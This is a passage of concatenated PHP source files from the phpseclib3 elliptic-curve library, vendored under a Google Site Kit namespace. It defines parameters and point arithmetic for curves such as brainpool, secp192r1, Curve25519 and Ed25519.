$this->extractSecret(\Google\Site_Kit_Dependencies\phpseclib3\Crypt\Random::string(57))['dA']; } /** * Converts an affine point to an extended homogeneous coordinate * * From https://tools.ietf.org/html/rfc8032#section-5.2.4 : * * A point (x,y) is represented in extended homogeneous coordinates (X, Y, Z, T), * with x = X/Z, y = Y/Z, x * y = T/Z. * * @return \phpseclib3\Math\PrimeField\Integer[] */ public function convertToInternal(array $p) { if (empty($p)) { return [clone $this->zero, clone $this->one, clone $this->one]; } if (isset($p[2])) { return $p; } $p[2] = clone $this->one; return $p; } /** * Doubles a point on a curve * * @return FiniteField[] */ public function doublePoint(array $p) { if (!isset($this->factory)) { throw new \RuntimeException('setModulo needs to be called before this method'); } if (!\count($p)) { return []; } if (!isset($p[2])) { throw new \RuntimeException('Affine coordinates need to be manually converted to "Jacobi" coordinates or vice versa'); } // from https://tools.ietf.org/html/rfc8032#page-18 list($x1, $y1, $z1) = $p; $b = $x1->add($y1); $b = $b->multiply($b); $c = $x1->multiply($x1); $d = $y1->multiply($y1); $e = $c->add($d); $h = $z1->multiply($z1); $j = $e->subtract($this->two->multiply($h)); $x3 = $b->subtract($e)->multiply($j); $y3 = $c->subtract($d)->multiply($e); $z3 = $e->multiply($j); return [$x3, $y3, $z3]; } /** * Adds two points on the curve * * @return FiniteField[] */ public function addPoint(array $p, array $q) { if (!isset($this->factory)) { throw new \RuntimeException('setModulo needs to be called before this method'); } if (!\count($p) || !\count($q)) { if (\count($q)) { return $q; } if (\count($p)) { return $p; } return []; } if (!isset($p[2]) || !isset($q[2])) { throw new \RuntimeException('Affine coordinates need to be manually converted to "Jacobi" coordinates or vice versa'); } if ($p[0]->equals($q[0])) { return !$p[1]->equals($q[1]) ? [] : $this->doublePoint($p); } // from https://tools.ietf.org/html/rfc8032#page-17 list($x1, $y1, $z1) = $p; list($x2, $y2, $z2) = $q; $a = $z1->multiply($z2); $b = $a->multiply($a); $c = $x1->multiply($x2); $d = $y1->multiply($y2); $e = $this->d->multiply($c)->multiply($d); $f = $b->subtract($e); $g = $b->add($e); $h = $x1->add($y1)->multiply($x2->add($y2)); $x3 = $a->multiply($f)->multiply($h->subtract($c)->subtract($d)); $y3 = $a->multiply($g)->multiply($d->subtract($c)); $z3 = $f->multiply($g); return [$x3, $y3, $z3]; } } <?php /** * brainpoolP160r1 * * PHP version 5 and 7 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Prime; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; class brainpoolP160r1 extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Prime { public function __construct() { $this->setModulo(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('E95E4A5F737059DC60DFC7AD95B3D8139515620F', 16)); $this->setCoefficients(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('340E7BE2A280EB74E2BE61BADA745D97E8F7C300', 16), new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('1E589A8595423412134FAA2DBDEC95C8D8675E58', 16)); $this->setBasePoint(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('BED5AF16EA3F6A4F62938C4631EB5AF7BDBCDBC3', 16), new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('1667CB477A1A8EC338F94741669C976316DA6321', 16)); $this->setOrder(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('E95E4A5F737059DC60DF5991D45029409E60FC09', 16)); } } <?php /** * Curve25519 * * PHP version 5 and 7 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2019 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Montgomery; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; class Curve25519 extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Montgomery { public function __construct() { // 2^255 - 19 $this->setModulo(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('7FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFED', 16)); $this->a24 = $this->factory->newInteger(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('121666')); $this->p = [$this->factory->newInteger(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger(9))]; // 2^252 + 0x14def9dea2f79cd65812631a5cf5d3ed $this->setOrder(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('1000000000000000000000000000000014DEF9DEA2F79CD65812631A5CF5D3ED', 16)); /* $this->setCoefficients( new BigInteger('486662'), // a ); $this->setBasePoint( new BigInteger(9), new BigInteger('14781619447589544791020593568409986887264606134616475288964881837755586237401') ); */ } /** * Multiply a point on the curve by a scalar * * Modifies the scalar as described at https://tools.ietf.org/html/rfc7748#page-8 * * @return array */ public function multiplyPoint(array $p, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $d) { //$r = strrev(sodium_crypto_scalarmult($d->toBytes(), strrev($p[0]->toBytes()))); //return [$this->factory->newInteger(new BigInteger($r, 256))]; $d = $d->toBytes(); $d &= "\xf8" . \str_repeat("\xff", 30) . ""; $d = \strrev($d); $d |= "@"; $d = new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger($d, -256); return parent::multiplyPoint($p, $d); } /** * Creates a random scalar multiplier * * @return BigInteger */ public function createRandomMultiplier() { return \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger::random(256); } /** * Performs range check */ public function rangeCheck(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $x) { if ($x->getLength() > 256 || $x->isNegative()) { throw new \RangeException('x must be a positive integer less than 256 bytes in length'); } } } <?php /** * prime192v1 * * PHP version 5 and 7 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves; final class prime192v1 extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves\secp192r1 { } <?php /** * secp192r1 * * This is the NIST P-192 curve * * PHP version 5 and 7 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Prime; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; class secp192r1 extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Prime { public function __construct() { $modulo = new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEFFFFFFFFFFFFFFFF', 16); $this->setModulo($modulo); // algorithm 2.27 from http://diamond.boisestate.edu/~liljanab/MATH308/GuideToECC.pdf#page=66 /* in theory this should be faster than regular modular reductions save for one small issue. to convert to / from base-2**8 with BCMath you have to call bcmul() and bcdiv() a lot. to convert to / from base-2**8 with PHP64 you have to call base256_rshift() a lot. in short, converting to / from base-2**8 is pretty expensive and that expense is enough to offset whatever else might be gained by a simplified reduction algorithm. now, if PHP supported unsigned integers things might be different. no bit-shifting would be required for the PHP engine and it'd be a lot faster. but as is, BigInteger uses base-2**31 or base-2**26 depending on whether or not the system is has a 32-bit or a 64-bit OS. */ /* $m_length = $this->getLengthInBytes(); $this->setReduction(function($c) use ($m_length) { $cBytes = $c->toBytes(); $className = $this->className; if (strlen($cBytes) > 2 * $m_length) { list(, $r) = $c->divide($className::$modulo); return $r; } $c = str_pad($cBytes, 48, "\0", STR_PAD_LEFT); $c = array_reverse(str_split($c, 8)); $null = "\0\0\0\0\0\0\0\0"; $s1 = new BigInteger($c[2] . $c[1] . $c[0], 256); $s2 = new BigInteger($null . $c[3] . $c[3], 256); $s3 = new BigInteger($c[4] . $c[4] . $null, 256); $s4 = new BigInteger($c[5] . $c[5] . $c[5], 256); $r = $s1->add($s2)->add($s3)->add($s4); while ($r->compare($className::$modulo) >= 0) { $r = $r->subtract($className::$modulo); } return $r; }); */ $this->setCoefficients(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEFFFFFFFFFFFFFFFC', 16), new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('64210519E59C80E70FA7E9AB72243049FEB8DEECC146B9B1', 16)); $this->setBasePoint(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('188DA80EB03090F67CBF20EB43A18800F4FF0AFD82FF1012', 16), new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('07192B95FFC8DA78631011ED6B24CDD573F977A11E794811', 16)); $this->setOrder(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('FFFFFFFFFFFFFFFFFFFFFFFF99DEF836146BC9B1B4D22831', 16)); } } <?php /** * sect233k1 * * PHP version 5 and 7 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Binary; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; class sect233k1 extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Binary { public function __construct() { $this->setModulo(233, 74, 0); $this->setCoefficients('000000000000000000000000000000000000000000000000000000000000', '000000000000000000000000000000000000000000000000000000000001'); $this->setBasePoint('017232BA853A7E731AF129F22FF4149563A419C26BF50A4C9D6EEFAD6126', '01DB537DECE819B7F70F555A67C427A8CD9BF18AEB9B56E0C11056FAE6A3'); $this->setOrder(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('8000000000000000000000000000069D5BB915BCD46EFB1AD5F173ABDF', 16)); } } <?php /** * Ed25519 * * PHP version 5 and 7 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\TwistedEdwards; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\Hash; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\Random; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; class Ed25519 extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\TwistedEdwards { const HASH = 'sha512'; /* Per https://tools.ietf.org/html/rfc8032#page-6 EdDSA has several parameters, one of which is b: 2. An integer b with 2^(b-1) > p. EdDSA public keys have exactly b bits, and EdDSA signatures have exactly 2*b bits. b is recommended to be a multiple of 8, so public key and signature lengths are an integral number of octets. SIZE corresponds to b */ const SIZE = 32; public function __construct() { // 2^255 - 19 $this->setModulo(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('7FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFED', 16)); $this->setCoefficients( // -1 new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('7FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEC', 16), // a // -121665/121666 new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('52036CEE2B6FFE738CC740797779E89800700A4D4141D8AB75EB4DCA135978A3', 16) ); $this->setBasePoint(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('216936D3CD6E53FEC0A4E231FDD6DC5C692CC7609525A7B2C9562D608F25D51A', 16), new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('6666666666666666666666666666666666666666666666666666666666666658', 16)); $this->setOrder(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('1000000000000000000000000000000014DEF9DEA2F79CD65812631A5CF5D3ED', 16)); // algorithm 14.47 from http://cacr.uwaterloo.ca/hac/about/chap14.pdf#page=16 /* $this->setReduction(function($x) { $parts = $x->bitwise_split(255); $className = $this->className; if (count($parts) > 2) { list(, $r) = $x->divide($className::$modulo); return $r; } $zero = new BigInteger(); $c = new BigInteger(19); switch (count($parts)) { case 2: list($qi, $ri) = $parts; break; case 1: $qi = $zero; list($ri) = $parts; break; case 0: return $zero; } $r = $ri; while ($qi->compare($zero) > 0) { $temp = $qi->multiply($c)->bitwise_split(255); if (count($temp) == 2) { list($qi, $ri) = $temp; } else { $qi = $zero; list($ri) = $temp; } $r = $r->add($ri); } while ($r->compare($className::$modulo) > 0) { $r = $r->subtract($className::$modulo); } return $r; }); */ } /** * Recover X from Y * * Implements steps 2-4 at https://tools.ietf.org/html/rfc8032#section-5.1.3 * * Used by EC\Keys\Common.php * * @param BigInteger $y * @param boolean $sign * @return object[] */ public function recoverX(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $y, $sign) { $y = $this->factory->newInteger($y); $y2 = $y->multiply($y); $u = $y2->subtract($this->one); $v = $this->d->multiply($y2)->add($this->one); $x2 = $u->divide($v); if ($x2->equals($this->zero)) { if ($sign) { throw new \RuntimeException('Unable to recover X coordinate (x2 = 0)'); } return clone $this->zero; } // find the square root /* we don't do $x2->squareRoot() because, quoting from https://tools.ietf.org/html/rfc8032#section-5.1.1: "For point decoding or "decompression", square roots modulo p are needed. They can be computed using the Tonelli-Shanks algorithm or the special case for p = 5 (mod 8). To find a square root of a, first compute the candidate root x = a^((p+3)/8) (mod p)." */ $exp = $this->getModulo()->add(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger(3)); $exp = $exp->bitwise_rightShift(3); $x = $x2->pow($exp); // If v x^2 = -u (mod p), set x <-- x * 2^((p-1)/4), which is a square root. if (!$x->multiply($x)->subtract($x2)->equals($this->zero)) { $temp = $this->getModulo()->subtract(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger(1)); $temp = $temp->bitwise_rightShift(2); $temp = $this->two->pow($temp); $x = $x->multiply($temp); if (!$x->multiply($x)->subtract($x2)->equals($this->zero)) { throw new \RuntimeException('Unable to recover X coordinate'); } } if ($x->isOdd() != $sign) { $x = $x->negate(); } return [$x, $y]; } /** * Extract Secret Scalar * * Implements steps 1-3 at https://tools.ietf.org/html/rfc8032#section-5.1.5 * * Used by the various key handlers * * @param string $str * @return array */ public function extractSecret($str) { if (\strlen($str) != 32) { throw new \LengthException('Private Key should be 32-bytes long'); } // 1. Hash the 32-byte private key using SHA-512, storing the digest in // a 64-octet large buffer, denoted h. Only the lower 32 bytes are // used for generating the public key. $hash = new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Hash('sha512'); $h = $hash->hash($str); $h = \substr($h, 0, 32); // 2. Prune the buffer: The lowest three bits of the first octet are // cleared, the highest bit of the last octet is cleared, and the // second highest bit of the last octet is set. $h[0] = $h[0] & \chr(0xf8); $h = \strrev($h); $h[0] = $h[0] & \chr(0x3f) | \chr(0x40); // 3. Interpret the buffer as the little-endian integer, forming a // secret scalar s. $dA = new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger($h, 256); return ['dA' => $dA, 'secret' => $str]; } /** * Encode a point as a string * * @param array $point * @return string */ public function encodePoint($point) { list($x, $y) = $point; $y = $y->toBytes(); $y[0] = $y[0] & \chr(0x7f); if ($x->isOdd()) { $y[0] = $y[0] | \chr(0x80); } $y = \strrev($y); return $y; } /** * Creates a random scalar multiplier * * @return \phpseclib3\Math\PrimeField\Integer */ public function createRandomMultiplier() { return $this->extractSecret(\Google\Site_Kit_Dependencies\phpseclib3\Crypt\Random::string(32))['dA']; } /** * Converts an affine point to an extended homogeneous coordinate * * From https://tools.ietf.org/html/rfc8032#section-5.1.4 : * * A point (x,y) is represented in extended homogeneous coordinates (X, Y, Z, T), * with x = X/Z, y = Y/Z, x * y = T/Z. * * @return \phpseclib3\Math\PrimeField\Integer[] */ public function convertToInternal(array $p) { if (empty($p)) { return [clone $this->zero, clone $this->one, clone $this->one, clone $this->zero]; } if (isset($p[2])) { return $p; } $p[2] = clone $this->one; $p[3] = $p[0]->multiply($p[1]); return $p; } /** * Doubles a point on a curve * * @return FiniteField[] */ public function doublePoint(array $p) { if (!isset($this->factory)) { throw new \RuntimeException('setModulo needs to be called before this method'); } if (!\count($p)) { return []; } if (!isset($p[2])) { throw new \RuntimeException('Affine coordinates need to be manually converted to "Jacobi" coordinates or vice versa'); } // from https://tools.ietf.org/html/rfc8032#page-12 list($x1, $y1, $z1, $t1) = $p; $a = $x1->multiply($x1); $b = $y1->multiply($y1); $c = $this->two->multiply($z1)->multiply($z1); $h = $a->add($b); $temp = $x1->add($y1); $e = $h->subtract($temp->multiply($temp)); $g = $a->subtract($b); $f = $c->add($g); $x3 = $e->multiply($f); $y3 = $g->multiply($h); $t3 = $e->multiply($h); $z3 = $f->multiply($g); return [$x3, $y3, $z3, $t3]; } /** * Adds two points on the curve * * @return FiniteField[] */ public function addPoint(array $p, array $q) { if (!isset($this->factory)) { throw new \RuntimeException('setModulo needs to be called before this method'); } if (!\count($p) || !\count($q)) { if (\count($q)) { return $q; } if (\count($p)) { return $p; } return []; } if (!isset($p[2]) || !isset($q[2])) { throw new \RuntimeException('Affine coordinates need to be manually converted to "Jacobi" coordinates or vice versa'); } if ($p[0]->equals($q[0])) { return !$p[1]->equals($q[1]) ? [] : $this->doublePoint($p); } // from https://tools.ietf.org/html/rfc8032#page-12 list($x1, $y1, $z1, $t1) = $p; list($x2, $y2, $z2, $t2) = $q; $a = $y1->subtract($x1)->multiply($y2->subtract($x2)); $b = $y1->add($x1)->multiply($y2->add($x2)); $c = $t1->multiply($this->two)->multiply($this->d)->multiply($t2); $d = $z1->multiply($this->two)->multiply($z2); $e = $b->subtract($a); $f = $d->subtract($c); $g = $d->add($c); $h = $b->add($a); $x3 = $e->multiply($f); $y3 = $g->multiply($h); $t3 = $e->multiply($h); $z3 = $f->multiply($g); return [$x3, $y3, $z3, $t3]; } } <?php /** * prime239v3 * * PHP version 5 and 7 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Prime; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; class prime239v3 extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Prime { public function __construct() { $this->setModulo(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('7FFFFFFFFFFFFFFFFFFFFFFF7FFFFFFFFFFF8000000000007FFFFFFFFFFF', 16)); $this->setCoefficients(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('7FFFFFFFFFFFFFFFFFFFFFFF7FFFFFFFFFFF8000000000007FFFFFFFFFFC', 16), new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('255705FA2A306654B1F4CB03D6A750A30C250102D4988717D9BA15AB6D3E', 16)); $this->setBasePoint(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('6768AE8E18BB92CFCF005C949AA2C6D94853D0E660BBF854B1C9505FE95A', 16), new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('1607E6898F390C06BC1D552BAD226F3B6FCFE48B6E818499AF18E3ED6CF3', 16)); $this->setOrder(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('7FFFFFFFFFFFFFFFFFFFFFFF7FFFFF975DEB41B3A6057C3C432146526551', 16)); } } <?php /** * sect409r1 * * PHP version 5 and 7 * * @author Jim Wiggint on <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Binary; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; class sect409r1 extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Binary { public function __construct() { $this->setModulo(409, 87, 0); $this->setCoefficients('00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001', '0021A5C2C8EE9FEB5C4B9A753B7B476B7FD6422EF1F3DD674761FA99D6AC27C8A9A197B272822F6CD57A55AA4F50AE317B13545F'); $this->setBasePoint('015D4860D088DDB3496B0C6064756260441CDE4AF1771D4DB01FFE5B34E59703DC255A868A1180515603AEAB60794E54BB7996A7', '0061B1CFAB6BE5F32BBFA78324ED106A7636B9C5A7BD198D0158AA4F5488D08F38514F1FDF4B4F40D2181B3681C364BA0273C706'); $this->setOrder(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('010000000000000000000000000000000000000000000000000001E2' . 'AAD6A612F33307BE5FA47C3C9E052F838164CD37D9A21173', 16)); } } <?php /** * sect283r1 * * PHP version 5 and 7 * * @author Jim Wiggint on <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Binary; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; class sect283r1 extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Binary { public function __construct() { $this->setModulo(283, 12, 7, 5, 0); $this->setCoefficients('000000000000000000000000000000000000000000000000000000000000000000000001', '027B680AC8B8596DA5A4AF8A19A0303FCA97FD7645309FA2A581485AF6263E313B79A2F5'); $this->setBasePoint('05F939258DB7DD90E1934F8C70B0DFEC2EED25B8557EAC9C80E2E198F8CDBECD86B12053', '03676854FE24141CB98FE6D4B20D02B4516FF702350EDDB0826779C813F0DF45BE8112F4'); $this->setOrder(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('03FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEF90399660FC938A90165B042A7CEFADB307', 16)); } } <?php /** * prime192v2 * * PHP version 5 and 7 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Prime; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; class prime192v2 extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Prime { public function __construct() { $this->setModulo(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEFFFFFFFFFFFFFFFF', 16)); $this->setCoefficients(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEFFFFFFFFFFFFFFFC', 16), new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('CC22D6DFB95C6B25E49C0D6364A4E5980C393AA21668D953', 16)); $this->setBasePoint(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('EEA2BAE7E1497842F2DE7769CFE9C989C072AD696F48034A', 16), new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('6574D11D69B6EC7A672BB82A083DF2F2B0847DE970B2DE15', 16)); $this->setOrder(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('FFFFFFFFFFFFFFFFFFFFFFFE5FB1A724DC80418648D8DD31', 16)); } } <?php /** * brainpoolP320r1 * * PHP version 5 and 7 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Prime; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; class brainpoolP320r1 extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Prime { public function __construct() { $this->setModulo(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('D35E472036BC4FB7E13C785ED201E065F98FCFA6F6F40DEF4F9' . '2B9EC7893EC28FCD412B1F1B32E27', 16)); $this->setCoefficients(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('3EE30B568FBAB0F883CCEBD46D3F3BB8A2A73513F5EB79DA66190EB085FFA9F4' . '92F375A97D860EB4', 16), new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('520883949DFDBC42D3AD198640688A6FE13F41349554B49ACC31DCCD88453981' . '6F5EB4AC8FB1F1A6', 16)); $this->setBasePoint(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('43BD7E9AFB53D8B85289BCC48EE5BFE6F20137D10A087EB6E7871E2A10A599C7' . '10AF8D0D39E20611', 16), new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('14FDD05545EC1CC8AB4093247F77275E0743FFED117182EAA9C77877AAAC6AC7' . 'D35245D1692E8EE1', 16)); $this->setOrder(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('D35E472036BC4FB7E13C785ED201E065F98FCFA5B68F12A32D4' . '82EC7EE8658E98691555B44C59311', 16)); } } <?php /** * brainpoolP320t1 * * PHP version 5 and 7 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Prime; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; class brainpoolP320t1 extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Prime { public function __construct() { $this->setModulo(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('D35E472036BC4FB7E13C785ED201E065F98FCFA6F6F40DEF4F9' . '2B9EC7893EC28FCD412B1F1B32E27', 16)); $this->setCoefficients( new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('D35E472036BC4FB7E13C785ED201E065F98FCFA6F6F40DEF4F92B9EC7893EC28' . 'FCD412B1F1B32E24', 16), // eg. -3 new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('A7F561E038EB1ED560B3D147DB782013064C19F27ED27C6780AAF77FB8A547CE' . 'B5B4FEF422340353', 16) ); $this->setBasePoint(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('925BE9FB01AFC6FB4D3E7D4990010F813408AB106C4F09CB7EE07868CC136FFF' . '3357F624A21BED52', 16), new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('63BA3A7A27483EBF6671DBEF7ABB30EBEE084E58A0B077AD42A5A0989D1EE71B' . '1B9BC0455FB0D2C3', 16)); $this->setOrder(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('D35E472036BC4FB7E13C785ED201E065F98FCFA5B68F12A32D4' . '82EC7EE8658E98691555B44C59311', 16)); } } <?php /** * brainpoolP256t1 * * PHP version 5 and 7 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Prime; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; class brainpoolP256t1 extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Prime { public function __construct() { $this->setModulo(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('A9FB57DBA1EEA9BC3E660A909D838D726E3BF623D52620282013481D1F6E5377', 16)); $this->setCoefficients( new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('A9FB57DBA1EEA9BC3E660A909D838D726E3BF623D52620282013481D1F6E5374', 16), // eg. -3 new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('662C61C430D84EA4FE66A7733D0B76B7BF93EBC4AF2F49256AE58101FEE92B04', 16) ); $this->setBasePoint(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('A3E8EB3CC1CFE7B7732213B23A656149AFA142C47AAFBC2B79A191562E1305F4', 16), new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('2D996C823439C56D7F7B22E14644417E69BCB6DE39D027001DABE8F35B25C9BE', 16)); $this->setOrder(new 